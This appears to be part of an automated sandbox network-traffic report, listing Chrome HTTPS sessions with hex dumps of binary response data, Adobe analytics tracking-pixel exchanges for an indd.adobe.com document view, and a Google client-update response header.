                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1949INData Raw: ac 54 30 96 f7 af 75 4f 84 63 08 c7 10 8e d5 46 8f 4f 39 c5 64 97 25 8d 7c 6a b7 ff 2c aa 44 56 16 b9 08 ec f0 b6 9f 8e cf 9e 2a 1b e4 84 96 c2 2f 05 76 7f 9f 1c ed 35 f1 a7 b6 a1 d9 32 9a 20 d2 27 7a fc cf a2 9c 30 52 c4 6a 2b c2 aa 98 cf ed dc 54 b0 dc aa 4e 23 1e 47 21 d6 ce 36 48 ed d4 3f 46 e4 56 7a cd 16 ab 6a 9f 9f 72 7f f0 f9 d0 98 28 c0 6a 9b 87 5f b7 59 6a db 88 fb 2b 27 ff 93 6f b9 d8 41 39 d6 ea 35 7e ec e9 4f 62 5e 08 c7 7a 1a 97 63 cb 08 a8 fb bd d6 15 57 ad 42 7b a5 fb 56 e5 ca 6e 88 88 5a 47 cc f6 f1 84 6f 75 c8 f9 2e 56 e3 dd 36 13 7b 40 00 02 10 80 00 04 20 00 81 a7 27 84 63 08 c7 b2 10 ac 74 5b 1b 3f 08 c7 10 8e 21 1c ab 8d 1e 9f 72 8a 09 bd a8 93 fe 8a 95 60 ec f5 42 a2 95 4f 7e f9 78 d8 fe b3 28 27 76 6c c2 4f e1 97 8a f8 4b 75 ed b2
                                                                                                                                                                                                                                                                                                              Data Ascii: T0uOcFO9d%|j,DV*/v52 'z0Rj+TN#G!6H?FVzjr(j_Yj+'oA95~Ob^zcWB{VnZGou.V6{@ 'ct[?!r`BO~x('vlOKu
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1950INData Raw: b3 1c 0f ed b0 b3 93 28 ed 7d e5 fb 5c 67 33 73 3a 08 40 00 02 10 80 00 04 ce 42 00 e1 d8 5d 08 85 28 ac 8c 45 6d 0c 20 1c 43 38 86 70 ac 36 7a 7c ca 29 84 2b 47 26 e6 3c a8 28 9f 88 cc 13 50 bd b6 36 41 eb c1 b0 e6 1c ca 89 9d 94 60 fa bd e6 ba 8f 94 51 c4 5f aa 6b 37 e1 98 f1 50 4f e0 a6 f8 79 33 91 c8 11 fb 50 76 9d 00 c2 b1 75 36 5b bf 28 27 a6 26 7d cb 25 5f e1 11 a1 7f a7 5d fa 1a 21 11 ec 62 b1 71 64 32 3a ca 8a b5 57 f4 2f f5 f8 d1 7c c7 73 7c ad ac 2f c2 b1 db f4 01 85 cd cf 08 16 be b6 f7 7c 33 3e 01 f5 7d 5e af 5c 92 f8 e1 82 b0 0f f7 b5 f0 58 f1 ea b2 97 5d 8d b5 85 ed 4a 8f 21 8e a3 dc 2f 63 f3 52 c3 b1 3f 04 20 00 01 08 40 00 02 d7 25 80 70 ac 4c 2c 85 b8 ec ce ab 36 6a 10 8e 21 1c 43 38 56 1b 3d 3e e5 14 c2 95 5e c9 be 56 c4 52 b2 23 c4 ea
                                                                                                                                                                                                                                                                                                              Data Ascii: (}\g3s:@B](Em C8p6z|)+G&<(P6A`Q_k7POy3Pvu6[('&}%_]!bqd2:W/|s|/|3>}^\X]J!/cR? @%pL,6j!C8V=>^VR#
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1952INData Raw: 08 40 00 02 10 80 00 04 4e 4e 00 e1 58 99 58 0a 71 d9 9d 57 6d 68 20 1c 43 38 86 70 ac 36 7a 7c ca 29 92 80 23 4d 64 05 9a d8 af 4e ba 58 52 dc c7 9b 8e 9d 45 39 11 66 89 2e 85 5f 2a e2 2f d5 d5 25 21 1d 30 7e dc 57 06 39 16 15 71 4b 23 1c 3b 6e 9b 08 4f e2 4f 92 fc 43 08 8c 4b a9 db 64 4f 04 01 2b 13 19 fb 2d 27 6e 5b fe dc 7f a5 cb 7b 46 f1 b9 14 db af 67 9c f0 4c 8c 23 ac d8 e8 26 62 98 7a 9b 72 bc 8c 70 ac 5c 38 c6 6b b3 a6 de 1b eb 73 ee 6f 58 11 f4 b1 5d a2 88 42 3c 57 d2 54 d7 79 74 9f 54 f6 53 f9 de a6 55 0e cc c6 f0 ad 8e f5 38 d2 c6 fc 35 82 ad 5b db 7c 4c 4b 70 d5 10 80 00 04 20 00 01 08 40 a0 92 00 c2 b1 bb 10 0a 51 58 19 8b 4a 97 7b 42 38 86 70 0c e1 58 6d f4 f8 94 53 08 57 14 02 9d 5a 9a c1 26 f6 6b c4 63 b6 92 cc 6f b5 f5 f7 2c a7 4e 3a 29
                                                                                                                                                                                                                                                                                                              Data Ascii: @NNXXqWmh C8p6z|)#MdNXRE9f._*/%!0~W9qK#;nOOCKdO+-'n[{FgL#&bzrp\8ksoX]B<WTytTSU85[|LKp @QXJ{B8pXmSWZ&kco,N:)
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1953INData Raw: ab 8e a5 f1 43 68 f1 58 a4 f1 77 eb b1 f7 da 98 7b 32 ae b3 b1 de 25 5e 5f b9 b3 cd 74 1f c7 b7 b6 79 4d db 49 19 08 40 00 02 10 80 00 04 20 30 2c 01 84 63 65 62 29 c4 65 77 5e b5 4e 8f 70 0c e1 18 c2 b1 da e8 f1 29 b7 23 11 d2 fc c6 7f c4 49 ff 40 49 c3 dd f6 18 2d c1 ad 9c 08 b3 c4 9f c2 2f 15 f1 97 ea ea 3e f1 a7 aa eb 24 a9 fb 28 76 6c 42 7a b8 84 af b5 4b 26 14 79 54 c7 5e 3d 89 32 71 ac 88 d5 5e 1c f3 71 95 3c 1f f9 8f 89 a6 f3 35 46 df 06 64 d8 74 c5 83 29 ff 1d ed e9 90 ab a4 88 27 1e 9b af 56 20 ae cf 6a 9f 37 d2 2b 96 02 32 94 0b 80 94 e3 65 6b 7b a6 6d d1 28 9f 77 b4 99 ab f1 b2 d1 47 96 94 1b a6 3f 1d c5 ae 47 af b3 70 dc 60 f7 0a bf 46 7f d8 e4 11 b3 28 af 19 9c c7 9c 7a dc 1f 64 d5 31 7b e5 f4 3f 22 e6 77 82 f5 d3 cd c7 de 7b fb 0f db 4f ed
                                                                                                                                                                                                                                                                                                              Data Ascii: ChXw{2%^_tyMI@ 0,ceb)ew^Np)#I@I-/>$(vlBzK&yT^=2q^q<5Fdt)'V j7+2ek{m(wG?Gp`F(zd1{?"w{O
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1954INData Raw: 84 63 08 c7 6a a3 c7 a7 5c e3 44 c8 ae e4 e0 c8 89 ec 88 13 0f f3 44 4a a4 24 54 89 17 2b 27 c2 8c a1 c2 2f 15 f1 97 ea 2a 13 8e 99 4f d8 6b 05 e6 7e 3b ca ff 96 a4 b4 89 83 d6 93 19 16 b7 ad c4 62 53 96 25 31 58 b2 6f a7 c9 b6 d3 f7 21 7b 18 9b 8f 4d 6d 38 c0 e7 17 f3 87 1e 6d a8 f5 b9 36 51 35 10 13 97 57 d9 35 ee 3b 6c 92 e8 57 0f fb 3d f2 77 3b 5f e3 7a ec 6a 3f 96 e2 c9 43 70 af 6c 33 97 ea bc e3 bb 6e 7e d1 ab bf db 51 a7 5a 1f 79 8b 34 b6 b6 d8 e9 58 d7 87 8c 2c 66 1f c5 75 e4 df 82 8a 65 f2 6a 7f 55 2b 1e 3e 9a ec f7 6e d3 23 db 7e ed da 9c da 65 bb e7 31 b1 96 44 28 62 f7 2b 49 f0 34 da bd d7 af 35 bb 29 bf 8f 32 6e 59 ea 03 d2 58 b9 e9 aa 56 49 f8 1e 5e 6c d8 fa be 7c ea 63 3d 6d 6e c7 b6 f8 54 b4 d7 03 b7 0d 36 4e b1 71 59 55 bf 39 b5 2d 9f 21
                                                                                                                                                                                                                                                                                                              Data Ascii: cj\DDJ$T+'/*Ok~;bS%1Xo!{Mm8m6Q5W5;lW=w;_zj?Cpl3n~QZy4X,fuejU+>n#~e1D(b+I45)2nYXVI^l|c=mnT6NqYU9-!
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1956INData Raw: 18 32 e2 ca b5 a1 c6 b5 4a df b0 57 3f d5 b4 d9 1e 65 94 e3 65 6b 7b 3c ea d8 eb 1c b7 db ed 97 d8 af dc 62 ec 4a 63 a5 5a 7f 51 8e 65 af e2 87 05 f5 74 17 e1 d7 fa 4d 2e c7 6b e5 fb de c3 6e f8 8e db 6b a4 19 73 4b ed fc d1 67 7a 09 05 73 7c b3 85 00 04 20 00 01 08 40 00 02 97 21 80 70 ec 2e 84 42 14 56 c6 a2 36 48 10 8e 21 1c 43 38 56 1b 3d 3e e5 14 89 90 b3 24 b2 23 bd 46 ec c7 8f 1f ff f0 f1 98 7e 67 51 4e 84 59 62 52 e1 97 8a f8 4b 75 0d 35 f1 97 c4 31 1f 89 c1 8d 44 31 fb 15 88 68 7a 45 ac 72 b2 4d 11 ab bd 38 ee 39 ae ba 6d 24 1e d7 27 4c 54 93 18 aa be e3 64 be e0 36 e9 b8 14 e7 88 42 d7 e3 4a ed 67 aa b8 5e f2 93 a5 ef 94 7d 82 b5 3d 4b d7 34 ca 77 57 1a 6f 5e 6d ac 54 e3 83 ca b1 ac ba 9d 0b 76 7e 89 08 bf c6 67 e6 65 f0 21 49 5f fe 32 b7 43 cf
                                                                                                                                                                                                                                                                                                              Data Ascii: 2JW?eek{<bJcZQetM.knksKgzs| @!p.BV6H!C8V=>$#F~gQNYbRKu51D1hzErM89m$'LTd6BJg^}=K4wWo^mTv~ge!I_2C
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1957INData Raw: bd e2 f8 1e 49 3c f6 52 c9 e8 b4 6d 52 05 8f 10 82 7f c6 dc 7e fd a4 b5 c9 c7 23 90 23 40 00 02 10 80 00 04 20 00 01 08 14 11 40 38 56 26 96 42 5c 76 e7 55 e4 68 93 9d 11 8e 21 1c 43 38 36 09 88 80 1f 15 89 90 33 26 b2 45 4f ad bf 06 74 a9 ea 4b 52 4e 84 59 22 53 e1 97 8a f8 4b 75 1d 66 c5 08 9e dc 3e 96 ac ad 0e c8 8d 82 ca c9 36 45 ac 6e e0 90 fd 9c da 4d 44 26 fd 26 ff 43 0a 8e 54 7d 47 c5 a4 5f 84 09 d0 90 36 7c d4 68 a4 7e ef 75 50 de 11 6c be 75 0d d6 66 0e fb e0 85 72 bc 6c 6d cf 23 df 1d ed 37 5b b9 f9 ac 71 c6 58 69 db 1b 95 63 d9 b3 fa dd 83 7a 3d 47 5f f5 73 db 63 f6 ef 91 5e 5b 89 78 ac 7e 7c 1e 66 d5 29 c6 dc c7 72 11 0f da 84 e9 58 2d dc 43 3a fb a3 9d 3d 21 00 01 08 40 00 02 10 80 c0 e0 04 10 8e dd 85 50 88 c2 ca 58 d4 ba 3e c2 31 84 63 08
                                                                                                                                                                                                                                                                                                              Data Ascii: I<RmR~##@ @8V&B\vUh!C863&EOtKRNY"SKuf>6EnMD&&CT}G_6|h~uPlufrlm#7[qXicz=G_sc^[x~|f)rX-C:=!@PX>1c
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1958INData Raw: ef 8f 9a ff cf 58 69 bf 87 da 8a 8e dc 4b ac 8e 95 b6 7c f3 f5 ac 2b 7d ee f7 a0 f2 3d 4d 88 74 e1 d5 b3 5f 46 6d 9f 26 02 32 f2 0e 5f c7 5f 8b 6d 85 8d 1b 46 b5 77 79 64 53 02 02 10 80 00 04 20 00 01 08 0c 48 00 e1 d8 5d 08 85 28 ac 8c 45 ad bb 23 1c 43 38 86 70 ac 36 7a 7c ca 29 26 1f cf 9c 38 48 af 12 ea 9a 48 3a eb 8a 1a e6 17 0b 13 c2 8b 09 a8 1e fb 29 fc 52 11 7f c6 ee 8c 13 7f 4c fa 7c 4c f8 98 88 e2 4f e3 d1 b3 17 41 38 d6 93 6e fb 63 13 1f 1f f1 61 7d ca f0 93 9c ac 7a f0 61 cf 61 56 ab 68 1f d5 7f 1d 11 01 d9 87 2f b8 f4 7d bd ec 58 72 5c e5 78 f9 8c e3 c7 25 f6 89 71 d7 fb b9 1e f7 32 d3 63 2a ee 6b 96 58 8e f4 5d 1a 2b d9 0a 64 88 72 b7 45 21 2f 08 c6 8e 7b 77 6a 6b 3c 56 ac 77 cb a9 4c db a1 d9 e7 e1 c7 df d9 e2 93 b6 e2 2a b6 2b f6 1f 1b 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: XiK|+}=Mt_Fm&2__mFwydS H](E#C8p6z|)&8HH:)RL|LOA8nca}zaaVh/}Xr\x%q2c*kX]+drE!/{wjk<VwL*+/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1960INData Raw: 72 c9 56 79 fa 9d c9 3f 4f 8b 73 ae 52 02 36 d1 61 93 d4 69 e5 42 13 37 f6 16 94 bd 12 23 a5 56 2a db df 26 fd b2 4d 27 ed 5e af c9 c8 f7 36 2f af 7c 69 fe 54 76 b5 ec dd 83 80 b3 0f 98 d0 74 1a d7 ef 13 92 f4 7d 3d 2c cb 31 3d 09 e4 f1 63 12 92 b5 14 02 64 91 8f 8d 4b df c7 8a 9e f5 e2 5c c7 09 a4 d5 86 ec 15 97 66 bf 77 d1 4f 1a db f4 ea 6b df 05 fd 76 8e f4 67 e7 cc f7 19 08 7d 8e 9b 34 cc 11 6c 1c 65 02 d6 ec 57 ad 5f 3b 6f fe 93 1e 66 ca 7d 35 fe d3 c9 fa d6 87 4c 6d 99 da 08 8f 87 73 3e c6 e6 93 76 82 55 5e 3b d9 99 c3 42 00 02 10 80 00 04 20 00 81 70 04 10 8e 95 89 a5 10 97 dd 79 d5 3a 33 c2 31 84 63 08 c7 6a a3 87 72 10 80 00 04 20 10 85 40 7a 32 d8 26 7d ec cf 92 e7 25 7f ef 93 35 a9 2c 2b ea 44 31 2a d7 d1 94 c0 2c 46 f2 e4 e8 ee 38 49 e2 a5 f7
                                                                                                                                                                                                                                                                                                              Data Ascii: rVy?OsR6aiB7#V*&M'^6/|iTvt}=,1=cdK\fwOkvg}4leW_;of}5Lms>vU^;B py:31cjr @z2&}%5,+D1*,F8I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1961INData Raw: 40 a0 11 01 84 63 65 62 29 c4 65 77 5e b5 2e 88 70 0c e1 18 c2 b1 da e8 a1 1c 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 68 44 00 e1 d8 5d 08 85 28 ac 8c 45 ad 0b 22 1c 43 38 86 70 ac 36 7a 28 07 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 1a 11 40 38 56 26 96 42 5c 76 e7 55 eb 82 08 c7 10 8e 21 1c ab 8d 1e ca 41 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 81 46 04 10 8e dd 85 50 88 c2 ca 58 d4 ba 20 c2 31 84 63 08 c7 6a a3 87 72 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01 08 40 00 02 10 80 00 04 20 00 01
                                                                                                                                                                                                                                                                                                              Data Ascii: @ceb)ew^.p @ @ @ @hD](E"C8p6z(@ @ @ @@8V&B\vU!A @ @ @ FPX 1cjr @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1965INData Raw: c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01
                                                                                                                                                                                                                                                                                                              Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1969INData Raw: 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80
                                                                                                                                                                                                                                                                                                              Data Ascii: `0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1970INData Raw: 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03
                                                                                                                                                                                                                                                                                                              Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1975INData Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60
                                                                                                                                                                                                                                                                                                              Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              1763.140.38.180443192.168.2.1649752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:20 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966770178850816-4617512325756774168
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:20 UTC519INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              18192.168.2.164975463.140.38.186443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:20 UTC519OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&pccr=true&vidn=329CA0F3A19B75CA-60000BAF437DAE53&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              1963.140.38.186443192.168.2.1649754C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:20 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:20 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966769984798720-4617714182744399147
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:20 UTC520INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2172.253.62.101443192.168.2.1649727C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ilwzb1WJ9R1wA_9kO_yhlA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                                                                                                                                              X-Daynum: 6141
                                                                                                                                                                                                                                                                                                              X-Daystart: 34036
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Server: GSE
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
